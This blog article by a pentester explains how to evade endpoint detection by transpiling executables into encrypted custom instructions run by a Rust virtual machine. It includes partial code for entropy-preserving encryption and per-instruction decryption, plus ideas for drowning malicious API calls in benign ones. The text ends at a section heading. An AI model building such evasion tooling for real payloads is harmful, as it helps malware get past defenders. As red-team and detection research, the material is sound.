EthicalHackers

Independent pentester and hacker for businesses

EDR evasion through transpilation and virtualization

There was a time when antivirus evasion was easy. There was even a time, around 2015/2016, when it was trivial, and several open source “silver bullets” existed that could evade defenses almost at will. From reflectively embedding payloads in memory, to shellcode packers, to PE encryption wrappers, the means of achieving stealth were as numerous as they were accessible.

In my experience, however, not only has this not been the case for some years, it is also getting worse: evasion techniques are scarcer, and they are technology dependent. Tooling used to be a cat-and-mouse race where the mouse often had the upper hand, but now the tables have turned. In the rare cases where a somewhat universal evasion technique is found, it usually becomes obsolete within months. This creates a vicious circle where attackers are less likely to share their tradecraft so as not to lose months of work, which means defenders have fewer techniques to optimize against, which means techniques are made obsolete even faster, which means attackers are more likely to keep their tradecraft to themselves, and so on.

It has come to the point that, I feel, as an attacker, you either develop your own tooling (and keep it to yourself), or you use existing tools and commit to the painful, time-consuming task of customizing them until their signatures and event traces are sufficiently distinct (a process you must repeat for every single one of your tools). Either way, the task is complex. The time you must sink into developing your own tools is significant, and I believe this problem is shared by most pentesters and red teams worldwide.

It’s with all that in mind that, a year ago, I stumbled across a blog post from Fox-IT called “Red Teaming in the age of EDR: Evasion of Endpoint Detection Through Malware Virtualisation”, written by Boudewijn Meijer and Rick Veldhoven, which details how a relatively simple virtualization layer can help evade modern EDRs.

In this article, I’ll give a quick breakdown of the current state of detection mechanisms as I understand it, explain how the aforementioned approach can help us bypass them, and give a glimpse into the implementation I started.

Evolution of antivirus

Historically, antivirus products were mostly glorified pattern-searching engines. Given enough bytes in common with a previously discovered virus, a file was deemed malicious. There were two characteristics that attackers abused to evade those kinds of engines.

First, this byte-sequence comparison meant that, if I managed to produce a PE with the same functionalities but different byte sequences, the antivirus wouldn’t catch the payload, even though the end result is the exact same. This was done in several ways. Manually editing the source code was, of course, one way of doing it. But the easy way out was to modify the whole payload at once through encoding (e.g., shikata_ga_nai), encryption (e.g., Veil-Evasion), or polymorphism (e.g., well, also shikata_ga_nai, but for its decoding stub).

Secondly, this file-centered paradigm meant that, if we somehow managed to execute our payload without it being an actual file, the antivirus would be completely blind. This was mostly done by creating small launchers that fetched the actual payload through an HTTP request (or any other channel) and launched it reflectively, meaning the bulk of what got executed never touched the disk to begin with. This discovery, tremendously popularized by PowerSploit and Empire, meant that a complete antivirus bypass was as easy as writing a single PowerShell line. This was the golden age of antivirus evasion.

However, as time went by, techniques to catch both approaches were either invented or improved with new optics to guide their judgment. We can classify those detection methods into two broad categories: pre-execution heuristics and runtime monitoring. Here’s a basic rundown of the main (not all) detections that those categories encompass:

Pre-execution heuristics

Entropy analysis

Entropy is one of the most effective ways of catching most encryption-based wrappers. Indeed, truly random data should be somewhat rare inside executable files. Instructions are not random, strings are not random, and resource files of most kinds should not be random (compressed data like images or archives being the notable exception here). Thus, higher than average entropy is considered a decent indicator that a given file is malicious.
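To make the notion concrete, here is a minimal sketch of how Shannon entropy can be computed over the bytes of a file or section. The function name `shannon_entropy` is mine and is not taken from any particular product; real engines typically compute it per section or over a sliding window, and combine it with other indicators.

```rust
/// Shannon entropy of a byte slice, in bits per byte (0.0 to 8.0).
/// Hypothetical helper for illustration only.
pub fn shannon_entropy(data: &[u8]) -> f64 {
    if data.is_empty() {
        return 0.0;
    }
    // Histogram of byte values.
    let mut counts = [0usize; 256];
    for &b in data {
        counts[b as usize] += 1;
    }
    let len = data.len() as f64;
    // Sum of -p * log2(p) over the byte values that actually occur.
    counts
        .iter()
        .filter(|&&c| c > 0)
        .map(|&c| {
            let p = c as f64 / len;
            -p * p.log2()
        })
        .sum()
}
```

A buffer made of a single repeated byte scores 0 bits per byte, while a buffer where every byte value is equally frequent scores 8, which is what well-encrypted data tends towards.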

Import Address Table Analysis

The IAT contains the external functions (resolved by the loader) the executable might use at run-time. As such, an executable referencing well-known functions often seen in malicious code (such as VirtualAlloc, VirtualProtect, etc.) is another sign that the PE might be malicious.

Pattern matching

Of course, the historical way of catching payloads still exists: section data such as strings or sequences of instructions found in previously identified malware are matched against analyzed files in order to determine whether or not they are malicious.

Runtime monitoring

Userland API hooking

Userland API hooking intercepts calls to sensitive Windows APIs within user-mode processes. EDRs commonly monitor functions related to memory allocation, code injection, and process creation (e.g., VirtualAlloc, WriteProcessMemory, CreateRemoteThread). By capturing these calls and their arguments, the agent is able to flag suspicious behavior even when the payload itself was obfuscated.

Event Tracing for Windows

ETW works on a provider-controller-consumer basis. Providers, which range from user-mode applications to kernel components, emit events. Controllers start tracing sessions and enable or disable providers. Security products can start a session with the relevant providers through their controller, then use their consumer agent to read events and take actions based on them.

Kernel level callback routines

EDRs often include a kernel-level agent (so, a driver) that registers callbacks on process and object notifications. Those notifications occur when key objects are created or modified. This allows kernel-level monitoring of process spawns and suspicious handle access, among other things. The monitoring of process spawning is what, I believe, triggered the switch in popular C2s from fork-and-run to in-process execution.

Memory scanning

Agents can inspect process memory for indicators such as executable pages without a file backing, regions marked RWX, byte patterns resembling known shellcode, etc. Memory scanning is often triggered when a suspicious event is identified through another sensor.

It’s also important to say that the runtime sensors collect events, but unless one specific event is known with certainty to be malicious, events are usually correlated with each other to classify a process as benign or not. This correlation is done either through human-written rules or through ML heuristics. Also, a lot of the sensors we just described only raise the “suspicious” score of the payload, and the payload is deemed malicious only when this score exceeds a particular threshold.
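The score-and-threshold idea can be sketched as follows. This is a toy model under my own assumptions: the event names, the weights, and the `is_flagged` function are all hypothetical and do not describe how any specific EDR works.

```rust
/// Hypothetical runtime events; names and weights are illustrative only.
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum SensorEvent {
    FileRead,
    RwxAllocation,
    UnbackedExecutablePage,
    RemoteThreadCreation,
}

/// Arbitrary suspicion weight attached to each event (assumed values).
fn weight(event: SensorEvent) -> u32 {
    match event {
        SensorEvent::FileRead => 0,
        SensorEvent::RwxAllocation => 30,
        SensorEvent::UnbackedExecutablePage => 40,
        SensorEvent::RemoteThreadCreation => 50,
    }
}

/// A process is flagged only once its cumulative score exceeds the threshold.
pub fn is_flagged(events: &[SensorEvent], threshold: u32) -> bool {
    let score: u32 = events.iter().map(|&e| weight(e)).sum();
    score > threshold
}
```

With a threshold of 60, a lone RWX allocation stays below the bar, while the same allocation followed by an unbacked executable page crosses it. Real products correlate far richer context (ordering, parent process, targets), which is what the rest of this article has to contend with.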

While, as I said, this list of detection mechanisms is not exhaustive, it provides a basic checklist of what we want our evasion tools to bypass.

Rundown of the approach

Before describing the approach itself, let’s draw some parallels with known systems that work in analogous ways.





In Java or .NET, for example, source code is compiled into an intermediate representation (Java bytecode for Java, and CIL for .NET), which is then executed in a runtime environment (the Java Virtual Machine for Java, and the Common Language Runtime for .NET). This managed runtime has multiple responsibilities, the main one being turning the intermediate language into native code, but also, for example, managing memory through garbage collection, ensuring thread synchronization, etc.



The approach Boudewijn Meijer and Rick Veldhoven described operates in a similar manner. However, instead of turning source code into an intermediate representation, an executable is transpiled into an intermediate representation, which is then executed in a managed virtual machine (MVM): a runtime environment re-implementing a simplified x86-64 instruction set.

The transpiler’s responsibilities are:

- Transform assembly instructions into encrypted instructions

- Do it in a manner that allows the managed runtime to decrypt instructions one at a time

- Do it in a manner that does not raise entropy

While Boudewijn Meijer and Rick Veldhoven do not do this, in my project I also transpile other sections of the executable, mainly .rdata (containing read-only data such as strings) and .data (mainly containing global variables), into encrypted blobs.

The intermediate file is then executed in the runtime environment, which has a few responsibilities:

- Executing the intermediate file

- Ensuring that cleartext incriminating data remains in memory for the shortest possible time

- Confusing event driven analysis

Pre-execution evasion

This way of executing intrinsically displays several interesting properties.

Because all instructions and data sections are stored in an encrypted format that does not raise entropy, pexes (the transpiled executables) contain no recognizable instruction sequences or strings. This makes them resistant to classical byte-pattern matching signatures. Other forms of static analysis (e.g., ML classifiers, anomalous section structure) could still apply, but raw byte matching is no longer effective.

Another way of catching encrypted instructions is to wait for them to be stored decrypted in memory. This method is also ineffective: instructions are decrypted, executed, and re-encrypted one at a time. Unlike standard shellcode execution, there is never a window where a large decrypted payload exists in memory. Detection would require flagging a single instruction at the precise moment it is decrypted, or reaching a sensor post-decryption (e.g., going through a hooked VirtualAlloc function; we’ll explore later what evasion tools this approach enables against those sensors).

Just like that, we have pretty good defenses against static pattern matching, memory analysis and entropy analysis, at least from the pexe perspective. The runtime environment could also be detected, which we will also address later.

Currently, the managed virtual machine has neither a linker nor a loader. Instead, functions are imported reflectively within the payload. As a result, the runtime environment does not import suspicious functions directly, rendering Import Address Table analysis ineffective. However, I will mention that PEB walking, which you have to do in order to reflectively load functions, can be seen as suspicious by EDRs. Pragmatically, I’ve never seen a payload detected because of this alone, but it’s something to keep in mind.

What about event analysis based on what sensors detect?



While this approach does not directly make your suspicious events disappear, it does provide means to complicate heuristic and event-tree-based detection. The architecture of this technique allows us to run multiple runtime engines from the same thread, one executing our malicious payload, the other pouring legitimate events at the same time, or in-between suspicious calls.

From the outside, all events appear tied to a single thread. An EDR attempting to reconstruct a timeline will see legitimate API usage surrounding or overlapping with malicious activity, making it harder to separate intent from noise. In practice, this disrupts correlation: the same thread may appear to allocate memory, free it, perform harmless file I/O, then suddenly inject code, but without a clear causal chain, thus obscuring the malicious pattern.

In short, this design does not remove visibility, but it corrupts some of the context surrounding events. Security tools still see events, yet the interleaving of benign and malicious actions makes it harder to assemble a conclusive picture, which can foil some event-based detection.

It will not, however, make unitary incriminating events appear legitimate. Drowning creation of an LSASS handle in legitimate events won’t help, since it is usually enough proof on its own of malicious activities. Interleaving only helps against detections that depend on chaining multiple events together. Uniquely incriminating events, such as sensitive handle creation, remain incriminating regardless of surrounding noise.

Transpilation process



The transpilation is quite straightforward. A PE is made of several sections, the one we’re most interested in being the .text section, which contains the encoded assembly instructions executed by the CPU. Going from an x86-64 instruction to a Phantomerie instruction (pinstruction for short) is the main objective of transpilation. This transformation operates as follows:



First, the instruction is decoded with the iced Rust library, then re-encoded in the pinstruction format.

// Format of a Pinstruction

pub struct Instruction {

pub opcode: u8,

pub left_operand_type: u8,

pub right_operand_type: u8,

// left_operand and right_operand can be:

// RegisterOperand, MemoryOperand, ImmediateOperand, or NoneOperand

pub left_operand: u64,

pub right_operand: u64,

}

The opcode, like in assembly, represents the operation specified by an instruction. In our managed virtual machine environment, which reimplements basic assembly operations, the opcode’s byte value is mapped to the corresponding instruction that should be executed.

e.g., if transpilation created a pinstruction with opcode 0x0D, which maps in our implementation to POP, the following code will get executed by the managed virtual machine:
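As a rough idea of what such a handler involves, here is a minimal sketch of a POP into RAX. It is not taken from the Phantomerie sources: `MiniCpu`, its fields, and `pop_rax` are hypothetical names, and the sketch assumes a plain, unencrypted byte vector as the stack, with RSP stored as an index into it.

```rust
/// Hypothetical, stripped-down CPU state used only for this illustration.
pub struct MiniCpu {
    /// Virtual RSP, expressed as an index into `stack`.
    pub rsp: usize,
    /// Virtual RAX.
    pub rax: u64,
    /// Virtual stack memory.
    pub stack: Vec<u8>,
}

impl MiniCpu {
    /// POP RAX: read 8 little-endian bytes at RSP, then move RSP up by 8.
    /// Panics if fewer than 8 bytes are available at RSP.
    pub fn pop_rax(&mut self) {
        let mut buf = [0u8; 8];
        buf.copy_from_slice(&self.stack[self.rsp..self.rsp + 8]);
        self.rax = u64::from_le_bytes(buf);
        self.rsp += 8;
    }
}
```

The real handler additionally has to resolve the destination operand generically and go through the encrypted stack accessors described later.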

Most assembly operations come with one operand, two operands, or none. Those are encoded in the left_operand and right_operand fields. This means that, for instructions with fewer than two operands, the unused fields act as padding. As in assembly, operands can be either immediate values or indirect values, i.e., values pulled from a register or from memory. That information (which type of operand we’re dealing with) is encoded in the left_operand_type and right_operand_type fields.

In our case, the registers and memory are virtual and maintained by the managed virtual machine environment. We’ll delve later into how virtual memory and virtual registers are implemented by the runtime. For now, all there is to know is that operands are encoded in 8-byte structures that are somewhat similar to the way they are encoded in assembly.

pub struct RegisterOperand {

/// The index of the register. Only the 64 bits registers are indexable (RAX, RBX, etc.)

pub name: Registers,

/// Specifies the chunk of the register to start at (e.g., low byte, high byte, word).

/// In practice, this is how we encode registers that do not start at the lowest byte (e.g., AH).

pub chunk: u8,

/// The size of the operand in bits (e.g., 8, 16, 32, or 64).

/// For example, if the name is RAX, then a size of 32 will actually encode EAX, while a size of 16 will encode AX, etc.

pub size: u16,

/// Reserved space to align the struct to 64 bits.

pub padding: u32,

}

pub struct MemoryOperand {

/// The effective size pointed by the operand in bits (e.g., 8, 16, 32, or 64).

pub size: u8,

/// The index of the base register. This is the starting address for the calculation.

pub base: u8,

/// The index of the register used for scaled indexing.

pub index: u8,

/// A multiplier for the index register (valid values are 1, 2, 4, or 8).

pub scale: u8,

/// A constant value added to the calculated address.

pub displacement: i32,

}

pub struct ImmediateOperand {

// As described in the original article, using an union facilitates the translation to different register sizes.

pub value: Value,

}

pub union Value {

pub u8: u8,

pub u16: u16,

pub u32: u32,

pub u64: u64,

}
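To illustrate how a register operand's `chunk` and `size` fields can select a sub-register, here is a small sketch. It assumes that `chunk` is a starting byte index (0 for AL/AX/EAX/RAX, 1 for AH) and that `size` is a width in bits; that reading of the fields is my assumption, and `read_sub_register` is a hypothetical helper, not part of the implementation.

```rust
/// Extract a sub-register view from a full 64-bit register value.
/// Assumption: `chunk` is the starting byte index, `size` the width in bits.
pub fn read_sub_register(full: u64, chunk: u8, size: u16) -> u64 {
    // Shift the requested starting byte down to bit 0 (0 if out of range).
    let shifted = full.checked_shr(u32::from(chunk) * 8).unwrap_or(0);
    if size >= 64 {
        shifted
    } else {
        // Keep only the low `size` bits.
        shifted & ((1u64 << size) - 1)
    }
}
```

For a virtual RAX holding 0x1122334455667788, this yields 0x88 for AL (chunk 0, size 8), 0x77 for AH (chunk 1, size 8), and 0x55667788 for EAX (chunk 0, size 32).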

The pinstruction format described so far, which is the exact format of the original article, allows us to represent most assembly instructions, but not all. For example, one form of the IMUL operation uses three operands, and some operations behave differently when a prefix is present, such as the REP prefixes, which indicate that the current instruction has to be repeated until the counter register reaches 0.

For those instructions, we added a “reserved” field, so additional data can be encoded when standard fields are not sufficient.

pub struct Instruction {

pub opcode: u8,

pub left_operand_type: u8,

pub right_operand_type: u8,

pub left_operand: u64,

pub right_operand: u64,

// for now, only used for IMUL and REP prefix

pub reserved: u32

}

Once the pinstruction is encoded, we encrypt it. We intentionally use a degenerate keystream (even-multiplier LCG with low-byte output) so that XOR obfuscation does not materially increase sliding-window entropy. Our goal is obfuscation while preserving the statistical profile of .text/.rdata/.data, not confidentiality.

To be fair, I dabbled in trying something other than pure XOR (hence the LCG-based algorithm) to mitigate some forms of pattern matching analysis, but my tests did not yield anything better than what a simple XOR scheme would have. In any case, the only important thing is to use an algorithm that perturbs structure without raising overall entropy beyond what’s normal for the respective sections.
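To see why an even multiplier makes the keystream degenerate, consider the low byte of the state. It only depends on the low byte of the previous state, and each multiplication by an even number discards one more bit of the seed, so after at most 8 steps the output byte no longer depends on the seed and stays constant. XORing with a constant byte merely permutes byte values, which leaves the byte histogram, and therefore the entropy, unchanged. The sketch below demonstrates this; the constants 6 and 0x3B are arbitrary values I picked for illustration, not the ones used in the project.

```rust
/// Low-byte keystream of an LCG: state = state * a + c (mod 2^32).
/// `a` and `c` are caller-supplied; an even `a` gives the degenerate case.
pub fn lcg_low_bytes(seed: u32, a: u32, c: u32, n: usize) -> Vec<u8> {
    let mut state = seed;
    (0..n)
        .map(|_| {
            state = state.wrapping_mul(a).wrapping_add(c);
            (state & 0xff) as u8
        })
        .collect()
}

/// True if every keystream byte from index 8 onwards is identical.
pub fn tail_is_constant(keystream: &[u8]) -> bool {
    keystream
        .get(8..)
        .map_or(true, |tail| tail.iter().all(|&b| b == tail[0]))
}
```

With an even multiplier, `tail_is_constant` holds for any seed, and two different seeds produce the same tail. With an odd multiplier, the low byte generally keeps changing, which is what would push entropy up.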

use std::num::Wrapping;

use crate::{ encryption_key::{ ENCRYPTION_SEED, LCG_CONSTANT_1, LCG_CONSTANT_2 }, Instruction };

pub struct SimpleStreamCipher {

state: Wrapping<u32>,

}

impl SimpleStreamCipher {

pub fn new(seed: u32) -> Self {

SimpleStreamCipher {

state: Wrapping(seed),

}

}

pub fn next(&mut self) -> u8 {

// Simple Linear Congruential Generator (LCG) - not cryptographically secure but we don't care

self.state = self.state * Wrapping(LCG_CONSTANT_1) + Wrapping(LCG_CONSTANT_2);

(self.state.0 & 0xff) as u8

}

// Encrypt/Decrypt data by XORing with generated keystream

pub fn apply_keystream(&mut self, data: &mut [u8]) {

for byte in data.iter_mut() {

*byte ^= self.next();

}

}

}

pub fn encrypt_decrypt_instruction(instr: &mut Instruction) {

let instr_bytes = unsafe {

std::slice::from_raw_parts_mut(

instr as *mut Instruction as *mut u8,

std::mem::size_of::<Instruction>()

)

};

let mut cipher = SimpleStreamCipher::new(ENCRYPTION_SEED);

cipher.apply_keystream(instr_bytes);

}

Instructions from PEs are not the only thing that gets encoded. Some headers are also stored in the resulting pexe, so that the managed virtual machine knows how to deserialize and execute the file.

pub struct PhantomerieHeaders {

pub entry_point: u64,

pub phantomerie_headers_size: u8,

pub instructions_section_size: u64,

pub instructions_number: u32,

pub arguments_section_size: u32,

pub arguments_number: u16,

pub rdata_size: u32,

}

Finally, we decided to also put other sections (for now, .rdata and .data) inside the transpiled pexe. This is the first real departure from the original implementation described by Boudewijn Meijer and Rick Veldhoven. The goal was to support more than PIC or stringless PEs.

The sections are imported as is from the PE, and the only difference is that they are encrypted using the same algorithm as the one used for instructions.

Transpilation quirks: offset translation

As described, one of the main differences between an instruction and a pinstruction is their size: native instructions are variable-length, while every pinstruction has the same fixed size.

This means that, in the current state of transpilation we described, when our managed virtual machine executes pinstructions, all offsets that were originally expressed in bytes will be wrong.

For example, in the original PE, a JMP +0x230 would jump 0x230 bytes forward relative to RIP.

But in our managed virtual machine, +0x230 from RIP does not point to the same place, since the size of instructions has changed. Therefore, during transpilation, we must translate every offset.

In practice, contrary to how the actual RIP functions, our virtual RIP value will not represent a byte offset from the base of the image, but an instruction index. Similarly, offsets used by operations such as JMP or CALL must no longer be expressed in bytes, but in number of instructions.

Consequently, at transpilation, we must list every instruction that uses a RIP-relative offset, determine which instruction the offset actually refers to, and then compute the instruction delta. We then replace the original offset with this adjusted value.

Thus, if JMP +0x230 in the native binary lands 10 instructions ahead, the transpiled pinstruction becomes JMP +10.


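The translation step can be sketched as follows. This is an illustration under my own assumptions rather than the project's code: `translate_offset` is a hypothetical function, native instructions are represented only by their byte lengths, and the resulting delta is counted from the instruction that follows the jump (mirroring how x86-64 measures displacements from the next instruction).

```rust
use std::collections::HashMap;

/// Translate a RIP-relative byte displacement into an instruction-index delta.
/// `lengths[i]` is the encoded length in bytes of native instruction `i`,
/// `jump_index` is the index of the jump, and `displacement` is relative to
/// the address of the instruction following the jump.
/// Returns None if the target is not the start of a known instruction.
pub fn translate_offset(lengths: &[usize], jump_index: usize, displacement: i64) -> Option<i64> {
    // Map the byte address of each instruction start to its index.
    let mut index_of = HashMap::new();
    let mut starts = Vec::with_capacity(lengths.len() + 1);
    let mut addr = 0usize;
    for (i, len) in lengths.iter().enumerate() {
        index_of.insert(addr, i);
        starts.push(addr);
        addr += len;
    }
    starts.push(addr); // address just past the last instruction

    let next_rip = *starts.get(jump_index + 1)? as i64;
    let target = next_rip + displacement;
    if target < 0 {
        return None;
    }
    let target_index = *index_of.get(&(target as usize))? as i64;
    Some(target_index - (jump_index as i64 + 1))
}
```

For instruction lengths `[2, 5, 3, 1, 4]`, a jump at index 0 with a displacement of +8 bytes targets byte 10, which is the start of instruction 3, so the translated delta is +2. A displacement landing in the middle of an instruction yields `None`, which a transpiler would want to treat as an error.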

Managed virtual machine inner workings

After transpiling an exe or a dll we get a pexe. The managed virtual machine (MVM) is the component whose aim is to execute it. How does that part of the architecture work?

First, it deserializes the pexe file back into a Phantomexe struct.

pub struct Phantomexe {

pub headers: PhantomerieHeaders,

pub instructions: Vec<Instruction>,

pub rdata: Section,

pub data: Section,

}

It then initializes its virtual CPU, which contains virtual registers, flags and stack memory. Those are what the pinstructions will modify. For example, the pinstruction MOV RAX 0 will set the virtual RAX to 0. MOV [RBP+0x10] 0x1 will write 0x1 on the virtual stack, at the virtual address contained in the virtual RBP register plus 16 bytes. Finally, an instruction such as TEST EAX EAX will update the virtual flags of the CPU.

To summarize, the pexe is made of pinstructions, which, when executed by the managed virtual machine, update the components of our virtual CPU. All of this works very much like exes, assembly, and the actual CPU do, albeit in a simplified manner.

The structures used by our implementation are as follows:
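As an illustration of the flag update, here is a minimal sketch of TEST on 32-bit operands. `MiniFlags` and `test32` are hypothetical names, and only three flags are modeled; on a real CPU, TEST also clears OF and sets PF according to the result.

```rust
/// Reduced, hypothetical flag set used only for this illustration.
#[derive(Debug, Default, PartialEq)]
pub struct MiniFlags {
    pub cf: bool,
    pub zf: bool,
    pub sf: bool,
}

/// TEST on 32-bit operands: bitwise AND, result discarded, flags updated.
pub fn test32(left: u32, right: u32) -> MiniFlags {
    let result = left & right;
    MiniFlags {
        cf: false,              // TEST always clears CF
        zf: result == 0,        // set when the AND result is zero
        sf: result >> 31 == 1,  // copy of the result's most significant bit
    }
}
```

TEST EAX EAX with EAX equal to 0 therefore sets ZF, which is what a following JZ/JE would branch on.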

pub struct VirtualMachine {

pub cpu: CPU,

pub phantomexe: Phantomexe,

pub context: Context,

}

pub struct CPU {

/// Number of instruction executed since the runtime initialization

pub number_of_instructions_executed: usize,

/// Stores the state of the CPU flags (e.g., zero, carry, overflow).

pub flags: Flags,

/// Contains general-purpose registers.

pub registers: [Register; 17],

/// Manages the stack

pub stack_manager: StackManager,

/// used to access and write sections from the pexe

pub sections_manager: SectionsManager,

}

pub struct Register {

pub register_name: Registers,

pub value: Value,

}

pub enum Registers {

NONE,

RAX,

RBX,

...

}

pub struct Flags {

/// Carry Flag (CF): Indicates an overflow for unsigned arithmetic operations.

pub cf: bool,

/// Zero Flag (ZF): Indicates if the result of an operation is zero.

pub zf: bool,

/// Sign Flag (SF): Indicates the sign of the result (0 for positive, 1 for negative).

pub sf: bool,

...

}

The stack manager handles initialization of, reads from, and writes to the stack.

pub struct StackManager {

pub stack: Vec<u8>,

pub maximum_stack_size: usize,

}

impl StackManager {

pub fn new() -> Self {

// standard stack size seems to be 1 MB.

// https://learn.microsoft.com/en-us/windows/win32/procthread/thread-stack-size

let maximum_stack_size = 1 * 1024 * 1024;

StackManager {

stack: vec![0; maximum_stack_size],

maximum_stack_size,

}

}

}

The section manager handles initialization of, reads from, and writes to sections.

pub struct SectionsManager {

pub idata: Section,

pub rdata: Section,

pub data: Section,

}

pub struct Section {

/// size taken on disk

pub disk_size: u32,

/// size in memory

pub memory_size: u32,

pub is_encrypted: bool,

pub raw: Vec<u8>,

}

Since there are a lot of similarities between those two components, they both implement the same Rust trait, called EncryptedReaderWriter.

pub trait EncryptedReaderWriter {

fn write_u8(&mut self, address: usize, value: u8) {

let bytes = [value];

self.write_bytes(address, &bytes);

}

...

fn write_u64(&mut self, address: usize, value: u64) {

let bytes = value.to_le_bytes();

self.write_bytes(address, &bytes);

}

fn read_u8(&self, address: usize) -> u8 {

self.read_bytes(address, 1)[0]

}

...

fn read_u64(&self, address: usize) -> u64 {

let bytes = self.read_bytes(address, 8);

u64::from_le_bytes([

bytes[0],

bytes[1],

bytes[2],

bytes[3],

bytes[4],

bytes[5],

bytes[6],

bytes[7],

])

}

fn read_bytes_as_value(&self, address: usize, length: usize) -> Value {

match length {

8 => Value::new_u8(self.read_u8(address)),

16 => Value::new_u16(self.read_u16(address)),

32 => Value::new_u32(self.read_u32(address)),

64 => Value::new_u64(self.read_u64(address)),

_ => Value::new_u64(self.read_u64(address)),

}

}

fn read_encrypted_bytes_as_value(&mut self, address: u64, size: u8) -> Value {

self.decrypt();

let unencrypted_value = self.read_bytes_as_value(address as usize, size as usize);

self.encrypt();

unencrypted_value

}

fn write_encrypted_value(&mut self, address: u64, value: Value, size: u8) {

self.decrypt();

match size {

8 => self.write_u8(address as usize, unsafe { value.u8 }),

16 => self.write_u16(address as usize, unsafe { value.u16 }),

32 => self.write_u32(address as usize, unsafe { value.u32 }),

64 => self.write_u64(address as usize, unsafe { value.u64 }),

_ => self.write_u64(address as usize, unsafe { value.u64 }),

}

self.encrypt();

}

fn decrypt(&mut self);

fn encrypt(&mut self);

fn write_bytes(&mut self, address: usize, data: &[u8]);

fn read_bytes(&self, address: usize, length: usize) -> Vec<u8>;

}

By doing so, we only have to implement decrypt, encrypt, write_bytes, and read_bytes for the Section and StackManager structures. Here is, for example, the Section implementation:

impl EncryptedReaderWriter for Section {

fn read_bytes(&self, address: usize, length: usize) -> Vec<u8> {

self.raw[address..address + length].to_vec()

}

fn write_bytes(&mut self, address: usize, data: &[u8]) {

self.raw.splice(address..address + data.len(), data.iter().cloned());

}

fn encrypt(&mut self) {

if self.is_encrypted {

return;

}

encrypt_decrypt_raw(&mut self.raw);

self.is_encrypted = true;

}

fn decrypt(&mut self) {

if !self.is_encrypted {

return;

}

encrypt_decrypt_raw(&mut self.raw);

self.is_encrypted = false;

}

}

While the managed virtual machine is executing pinstructions, the decryption/re-encryption happens on ordinary buffers (our virtual stack and virtual sections are just variables of the managed virtual machine), and not on the actual stack and sections of the program. This does not trigger the same telemetry as decrypting real executable pages in place (which looks like self-modifying code).



We talked about the effect of executing a pinstruction on our virtual CPU, but how is this implemented by our managed virtual machine?



First, execution follows a principle analogous to the principle of least privilege, which we’ll call the least exposure principle. It stipulates that, for each instruction, the managed virtual machine should only decrypt the minimum amount of data necessary for the execution of the pinstruction.

Thus, for a given instruction, the instruction itself is decrypted.

Then, if the instruction needs to access the stack, it decrypts the current stackframe. If the instruction accesses a section, the section is decrypted. It would be ideal to only decrypt the part of the section that is read, but since we don’t have type knowledge post-compilation, this is either complex to implement or straight up impossible.

Once the runtime is done executing the instruction, everything is encrypted again: the instruction, and if needed, the sections and / or the current stackframe. Here’s a visual illustration of what would be encrypted and decrypted for three instructions, one of them accessing rdata:

As an example, let’s follow the execution of a simple pinstruction, such as MOV RAX [RBP+0x10].

First, after the managed virtual machine deserializes the pexe, it dispatches each instruction.

// this simplified code is executed for each pinstruction

fn dispatch_instruction(&mut self) -> Option<()> {

let original_rip = self.get_rip() as usize;

encrypt_decrypt_instruction(&mut self.context.instructions[original_rip]);

let execution_result = self.cpu.execute_instruction(&mut self.context.instructions[original_rip]);

// We'll explain what this does later

self.cpu.update_pointers(&mut self.context.instructions[original_rip]);

encrypt_decrypt_instruction(&mut self.context.instructions[original_rip]);

match execution_result {

// if we executed the last RET we notify execution has stopped

Some(_) => {

self.next_instruction(original_rip as u64);

Some(())

}

None => {

return None;

}

}

}

When the managed virtual machine calls execute_instruction with the pinstruction MOV RAX [RBP+0x10] as argument, the operation code of the pinstruction is matched to the correct virtual operation, here our implementation of MOV.

pub fn execute_instruction(&mut self, instruction: &Instruction) -> Option<()> {

match instruction.opcode {

OperationCode::ADD => self.add(instruction),

OperationCode::AND => self.and(instruction),

OperationCode::SUB => self.sub(instruction),

OperationCode::MOV => self.mov(instruction),

...

OperationCode::RET => {

if self.ret().is_none() {

return None;

}

}

_ => panic!("Opcode not supported : 0x{:X}", instruction.opcode),

}

return Some(());

}

// how MOV is implemented in our runtime

impl CPU {

pub fn mov(&mut self, instruction: &Instruction) {

let value_to_mov = unsafe {

self.fetch_value(

OperandType::from(instruction.right_operand_type),

Operand::from_u64(instruction.right_operand)

).u64

};

let src_size = instruction.get_operand_size(OperandPlacement::Right).unwrap();

self.set_value(

instruction.left_operand_type,

instruction.left_operand,

value_to_mov,

src_size as u8

);

}

}

MOV is a simple instruction that transfers the content of the source operand to the destination operand. In our managed virtual machine, the content of operands is fetched through an operand-agnostic function (fetch_value in the following simplified excerpt) that gets the desired value for any source operand type. If the source operand is a register, the value is fetched from cpu.registers; if it’s a memory operand, the stack manager is what fetches it.

// simplified code of fetch_value

pub fn fetch_value(&mut self, operand_type: OperandType, operand: Operand) -> Value {

match operand_type {

OperandType::Immediate => unsafe { operand.immediate_operand.value },

OperandType::Memory => {

let memory_operand = unsafe { operand.memory_operand };

let effective_address = memory_operand.get_effective_address(|reg| {

self.get_register_value_u64(reg)

});

self.fetch_address(effective_address, &memory_operand)

}

OperandType::Register => {

let register_operand = unsafe { operand.register_operand };

self.fetch_register_value(&register_operand)

}

OperandType::None => panic!("None operand type does not have a value"),

}

}
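For memory operands, the effective address follows the usual x86-64 formula: base + index × scale + displacement. Here is a minimal sketch of that computation, assuming the base and index register values have already been read from the virtual CPU; `effective_address` is a hypothetical free function, not the project's `get_effective_address` method.

```rust
/// Compute base + index * scale + displacement with 64-bit wrap-around.
/// `base` and `index` are the current values of the corresponding virtual
/// registers (0 when the operand does not use them).
pub fn effective_address(base: u64, index: u64, scale: u8, displacement: i32) -> u64 {
    base.wrapping_add(index.wrapping_mul(u64::from(scale)))
        // Sign-extend the 32-bit displacement before adding it.
        .wrapping_add(displacement as i64 as u64)
}
```

For our example MOV RAX [RBP+0x10], there is no index register, so the address is simply the virtual RBP plus 0x10. Wrapping arithmetic is used so that negative displacements such as [RBP-0x8] work without overflow panics.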

The value is then written to the destination operand by set_value.

// simplified code of set_value

pub fn set_value(

&mut self,

operand_type: OperandType,

operand: Operand,

value: Value,

value_size: u8

) {

match operand_type {

OperandType::Immediate => panic!("Tried to set value for an immediate operand"),

OperandType::Memory => {

let memory_operand = unsafe { operand.memory_operand };

self.set_memory_value(

&memory_operand,

value,

value_size

);

}

OperandType::Register => {

let mut register_operand = unsafe { operand.register_operand };

self.set_register_value(&register_operand, value, value_size);

}

OperandType::None => panic!("Tried to set indirect value for a None operand type"),

}

}

After our example pinstruction has been executed, the virtual RAX holds the value read at [RBP+0x10], the pinstruction is re-encrypted, and, if needed, so are the section and the stack.

Managed virtual machine detection loop

